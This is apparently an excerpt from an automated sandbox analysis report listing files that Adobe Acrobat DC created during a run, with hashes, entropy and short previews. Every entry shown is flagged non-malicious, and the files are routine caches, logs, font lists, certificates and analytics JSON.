SHA-512:	765160DC21D06C504C5E6CDD912006F18A8F79264B4C4F7670E776C6F22AEDF58B13EFC180A7B7E5DA38A46D96ACBD9A6F15A50F6F46AB9A273520AC5DC439D7
Malicious:	false
Preview:	*...#................version.1..namespace-['O.o................next-map-id.1.Pnamespace-158f4913_074a_4bdf_b463_eb784cc805b4-https://rna-resource.acrobat.com/.0>...r................next-map-id.2.Snamespace-fd2db5bd_ef7e_4124_bfa7_f036ce1d74e5-https://rna-v2-resource.acrobat.com/.1O..r................next-map-id.3.Snamespace-cd5be8d1_42d2_481d_ac0e_f904ae470bda-https://rna-v2-resource.acrobat.com/.2.\.o................next-map-id.4.Pnamespace-6070ce43_6a74_4d0a_9cb8_0db6c3126811-https://rna-resource.acrobat.com/.3....^...............Pnamespace-158f4913_074a_4bdf_b463_eb784cc805b4-https://rna-resource.acrobat.com/..\|.^...............Pnamespace-6070ce43_6a74_4d0a_9cb8_0db6c3126811-https://rna-resource.acrobat.com/n..Fa...............Snamespace-fd2db5bd_ef7e_4124_bfa7_f036ce1d74e5-https://rna-v2-resource.acrobat.com/DQ..a...............Snamespace-cd5be8d1_42d2_481d_ac0e_f904ae470bda-https://rna-v2-resource.acrobat.com/i.`do................next-map-id.5.Pnamespace-de635bf2_6773_4d83_ad16_

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	324
Entropy (8bit):	5.089335068973409
Encrypted:	false
SSDEEP:	6:iOCIq2Pwkn2nKuAl9OmbzNMxIFUttZmwVkwOwkn2nKuAl9OmbzNMFLJ:7CIvYfHAa8jFUtt/V5JfHAa84J
MD5:	2464CC97A96084516BB2A4BD6C0C13D7
SHA1:	DF90832810CFA71BA9991B4652F1FF2543824EAA
SHA-256:	6B1818A43F090CD482B2FDE217DB01E0CB9CEE90D6A4262E6A01F842DDC4395C
SHA-512:	23490E7BEFF2C52B062215D13251A8AD43E27B3999C8A9B8BF4169E4F6B561C02C18E907DF156A4C70F39CB4C59AA5676FFE3D4BBC0F94BA8719041075275775
Malicious:	false
Preview:	2025/01/04-21:03:00.231 1eb4 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2025/01/04-21:03:00.232 1eb4 Recovering log #3.2025/01/04-21:03:00.232 1eb4 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	324
Entropy (8bit):	5.089335068973409
Encrypted:	false
SSDEEP:	6:iOCIq2Pwkn2nKuAl9OmbzNMxIFUttZmwVkwOwkn2nKuAl9OmbzNMFLJ:7CIvYfHAa8jFUtt/V5JfHAa84J
MD5:	2464CC97A96084516BB2A4BD6C0C13D7
SHA1:	DF90832810CFA71BA9991B4652F1FF2543824EAA
SHA-256:	6B1818A43F090CD482B2FDE217DB01E0CB9CEE90D6A4262E6A01F842DDC4395C
SHA-512:	23490E7BEFF2C52B062215D13251A8AD43E27B3999C8A9B8BF4169E4F6B561C02C18E907DF156A4C70F39CB4C59AA5676FFE3D4BBC0F94BA8719041075275775
Malicious:	false
Preview:	2025/01/04-21:03:00.231 1eb4 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2025/01/04-21:03:00.232 1eb4 Recovering log #3.2025/01/04-21:03:00.232 1eb4 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .

C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ConnectorIcons\icon-250105020305Z-185.bmp

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	PC bitmap, Windows 3.x format, 110 x -152 x 32, cbSize 66934, bits offset 54
Category:	dropped
Size (bytes):	66934
Entropy (8bit):	1.7544134515160215
Encrypted:	false
SSDEEP:	192:8iRvM0C0BLs5q/z4molmRy8OazjL+ZdTkdAw888888H+88838Sak888888H+888x:8iRLfG2gazjL+3TkdApSsWkvXQV
MD5:	A61E2E877B9BEBF90983EE1455F6C731
SHA1:	C0C641D144A7D5BA73C505EBE6EA34D92EF2335F
SHA-256:	FB3D9E842D9E3703AEE31D85DB37A454460C35575955661DF1961DAE53089D44
SHA-512:	B3B9B8924D74208FD40AE031886AA4C87158CCE498B5FCC0925C87E7D42543A9B7E0560229319A024424B3D73D5723E631113D310DE09CF0D28E68966044B1C1
Malicious:	false
Preview:	BMv.......6...(...n...h..... ...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	SQLite 3.x database, last written using SQLite version 3040000, file counter 17, database pages 21, cookie 0x5, schema 4, UTF-8, version-valid-for 17
Category:	dropped
Size (bytes):	86016
Entropy (8bit):	4.444841601838946
Encrypted:	false
SSDEEP:	384:Semci5txiBA7aDQPsknQ0UNCFOa14ocOUw6zyFzqFkdZ+EUTTcdUZ5yDQhJL:aCs3OazzU89UTTgUL
MD5:	0A9374E40DEA6EE564ECC0A9C168BDE8
SHA1:	6E0856774799EBF24C9626EF54C592B487FECC1B
SHA-256:	5C114F89A44C7848CCA44ACF34C03E59A7A8C5064C6B4255E4949BA159F79D7C
SHA-512:	1E93500F204555ACD9D28A04EC1F994288F5D780B00CADAAA8AE847BA0C2BE3D374D7376B9B88B912D409F75F6A6F75B415987F29392ED325102FCF12AD01752
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................c.......1........T...U.1.D............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages-journal

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	SQLite Rollback Journal
Category:	dropped
Size (bytes):	8720
Entropy (8bit):	2.2134361948692827
Encrypted:	false
SSDEEP:	24:7+tu2nuwK3qLrzkrFsgIFsxX3pALXmnHpkDGjmcxBSkomXk+2m9RFTsyg+wmf9MD:7MPnC3qvmFTIF3XmHjBoGGR+jMz+Lhq
MD5:	A73987E8F871EAE30157F362CE074040
SHA1:	ABE0F4C33323245C26432E90143A36E2B24ED2DB
SHA-256:	A2AA30F74DEC73013A9E3F58E23EB4E25866C837AE9A4B9AA15BEE5A19F6DB08
SHA-512:	925512D4F497A83A2416904632C02AFA4D5A0C4D9F65F74415DC8E8E3B926483FD703AF0DA405FE25F25E0A281A4FC55BAFE376D6EAA2023E757E87146592E0F
Malicious:	false
Preview:	.... .c......a.`........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	Certificate, Version=3
Category:	dropped
Size (bytes):	1391
Entropy (8bit):	7.705940075877404
Encrypted:	false
SSDEEP:	24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
MD5:	0CD2F9E0DA1773E9ED864DA5E370E74E
SHA1:	CABD2A79A1076A31F21D253635CB039D4329A5E8
SHA-256:	96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
SHA-512:	3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
Malicious:	false
Preview:	0..k0..S............@.YDc.c...0....H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0....H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.\|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I......A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.\|C.t..t.....0.[q6....00\H..;..}`...).........A.......\|.;F.H..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..\|o..;.....'...}~.."......

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
Category:	dropped
Size (bytes):	71954
Entropy (8bit):	7.996617769952133
Encrypted:	true
SSDEEP:	1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
MD5:	49AEBF8CBD62D92AC215B2923FB1B9F5
SHA1:	1723BE06719828DDA65AD804298D0431F6AFF976
SHA-256:	B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
SHA-512:	BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
Malicious:	false
Preview:	MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..\|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........\|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.\|.c.&>?..^t. ..;..X.d.E.0G....[Q.,......#.Dp..L.o\|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	data
Category:	dropped
Size (bytes):	192
Entropy (8bit):	2.7130774337030337
Encrypted:	false
SSDEEP:	3:kkFklG6sTwVEl1fllXlE/HT8klYh1NNX8RolJuRdxLlGB9lQRYwpDdt:kKfK9T8sYRNMa8RdWBwRd
MD5:	CD3DB072A002B6FEB3AB82B56FE5B1C8
SHA1:	0476EEB345FF208A4C35EA21DC316099E555BD46
SHA-256:	DDCB461F55346DF87EF4A159CDAE35E55593FFC5FEB9772265B3B006A1FD08BD
SHA-512:	509410251CC31FDDB0244FA431DD3F355D2E323F65D13ECB4C5653E4918DDBE49F09A41C844BB069AE4FE26387759D2EB9E1562338859BC1E67F1C35DA513C45
Malicious:	false
Preview:	p...... ........._..._..(....................................................... ..........W....................o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	data
Category:	modified
Size (bytes):	328
Entropy (8bit):	3.253995428229511
Encrypted:	false
SSDEEP:	6:kKDR9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:rADImsLNkPlE99SNxAhUe/3
MD5:	9A9A0CA9F56CA5E1F42463AFFCBE7CE4
SHA1:	1DADF47F3E9752D9F0E42E385CD48CC08AD484B3
SHA-256:	765FF34EA6FF4251E4D46007E629974A4A83474479D8B458735DD977728101DB
SHA-512:	28B5D04448395815202D17187808FEDBF5CF425A0970C45992C871CEC6A0A4884F7EE368D5A2AD29F520B2D681A7B2468BCAB2922B90D228515934B82B8BB722
Malicious:	false
Preview:	p...... ........j...._..(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeCMapFnt23.lst (copy)

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	PostScript document text
Category:	dropped
Size (bytes):	1233
Entropy (8bit):	5.233980037532449
Encrypted:	false
SSDEEP:	24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
MD5:	8BA9D8BEBA42C23A5DB405994B54903F
SHA1:	FC1B1646EC8A7015F492AA17ADF9712B54858361
SHA-256:	862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
SHA-512:	26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
Malicious:	false
Preview:	%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeFnt23.lst.7488

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	PostScript document text
Category:	dropped
Size (bytes):	1233
Entropy (8bit):	5.233980037532449
Encrypted:	false
SSDEEP:	24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
MD5:	8BA9D8BEBA42C23A5DB405994B54903F
SHA1:	FC1B1646EC8A7015F492AA17ADF9712B54858361
SHA-256:	862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
SHA-512:	26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
Malicious:	false
Preview:	%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeSysFnt23.lst (copy)

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	PostScript document text
Category:	dropped
Size (bytes):	1233
Entropy (8bit):	5.233980037532449
Encrypted:	false
SSDEEP:	24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
MD5:	8BA9D8BEBA42C23A5DB405994B54903F
SHA1:	FC1B1646EC8A7015F492AA17ADF9712B54858361
SHA-256:	862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
SHA-512:	26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
Malicious:	false
Preview:	%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\AcroFnt23.lst (copy)

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	PostScript document text
Category:	dropped
Size (bytes):	10880
Entropy (8bit):	5.214360287289079
Encrypted:	false
SSDEEP:	192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
MD5:	B60EE534029885BD6DECA42D1263BDC0
SHA1:	4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
SHA-256:	B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
SHA-512:	52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
Malicious:	false
Preview:	%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\AdobeFnt23.lst.7488

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	PostScript document text
Category:	dropped
Size (bytes):	10880
Entropy (8bit):	5.214360287289079
Encrypted:	false
SSDEEP:	192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
MD5:	B60EE534029885BD6DECA42D1263BDC0
SHA1:	4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
SHA-256:	B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
SHA-512:	52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
Malicious:	false
Preview:	%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	295
Entropy (8bit):	5.366101902260488
Encrypted:	false
SSDEEP:	6:YEQXJ2HXDiB6BcNHV9VoZcg1vRcR0Y0DeoAvJM3g98kUwPeUkwRe9:YvXKX+B6BcN1EZc0vXVGMbLUkee9
MD5:	7D866DCEEAB89EBB1499945815FB6D68
SHA1:	FB644F2573E920A842510AD46498A618409FFCC1
SHA-256:	EC8C696C5A2D1EC50CAC0A16040EE13A4380A19C012D66296B0BE9D037BE739E
SHA-512:	09DD2B66BEABCCB55B540F9DF7120C33450158BBE0926DF6A94C1A8BFAF554FA6C21D7F3499676058F774BD24FA8BB349192EBD55F6B16A3F50830F25CFC7116
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"4f632df1-5003-4e6a-9841-54a4d9a300fd","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736216753302,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	294
Entropy (8bit):	5.315974502472593
Encrypted:	false
SSDEEP:	6:YEQXJ2HXDiB6BcNHV9VoZcg1vRcR0Y0DeoAvJfBoTfXpnrPeUkwRe9:YvXKX+B6BcN1EZc0vXVGWTfXcUkee9
MD5:	8DD2D0C612566AF92907C0A237FBE87F
SHA1:	96CF780D42C141E15F926A00D548D2FD56933FBD
SHA-256:	82FB77E520479999862654A86CE173F07BBCC88FAF80301E1CF95D2B93DB9F3F
SHA-512:	6E72C70374DE335993CBDA9CC356852941A4F06A2C4EC168E97D05B5121CB0CE695EF3D77A418F2519A9EC3252EA8D8800604AD8A61D8F787DACB458323D56B6
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"4f632df1-5003-4e6a-9841-54a4d9a300fd","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736216753302,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	294
Entropy (8bit):	5.295172250441798
Encrypted:	false
SSDEEP:	6:YEQXJ2HXDiB6BcNHV9VoZcg1vRcR0Y0DeoAvJfBD2G6UpnrPeUkwRe9:YvXKX+B6BcN1EZc0vXVGR22cUkee9
MD5:	CE50865B1AE4092837AC221F15DDFC2C
SHA1:	29692182D6750BCA81E82D579D629629C333CB36
SHA-256:	C6D66789EB7F68BA6A640490A17357ABA423B5B9A3AA98915419103ACE67DC89
SHA-512:	800B0E4922AF22F958E909E1495F190AC6711BD1CF749A621F8556912D11B66226A86CE76465C9886728B81E2802814CCE439A33216044550E59EC473F8CAC7B
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"4f632df1-5003-4e6a-9841-54a4d9a300fd","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736216753302,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	285
Entropy (8bit):	5.353208496734358
Encrypted:	false
SSDEEP:	6:YEQXJ2HXDiB6BcNHV9VoZcg1vRcR0Y0DeoAvJfPmwrPeUkwRe9:YvXKX+B6BcN1EZc0vXVGH56Ukee9
MD5:	FD5BE5DE599B91D100FCABBD1CE3E4B3
SHA1:	4988F397266D4C3597A1B94DCAB992E22D1DD5DE
SHA-256:	302686EBA3301618AF26BA29352836F1DCDA036EE9C4938FEF48B1F6B24684F1
SHA-512:	E275B069607E5E414B5938580B02F48E7C8780E9394EFD11E5348D19A34DDE869BD558010890DBA37DD1E31111227133BDF04E46613C2FE91052280E83E086FD
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"4f632df1-5003-4e6a-9841-54a4d9a300fd","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736216753302,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

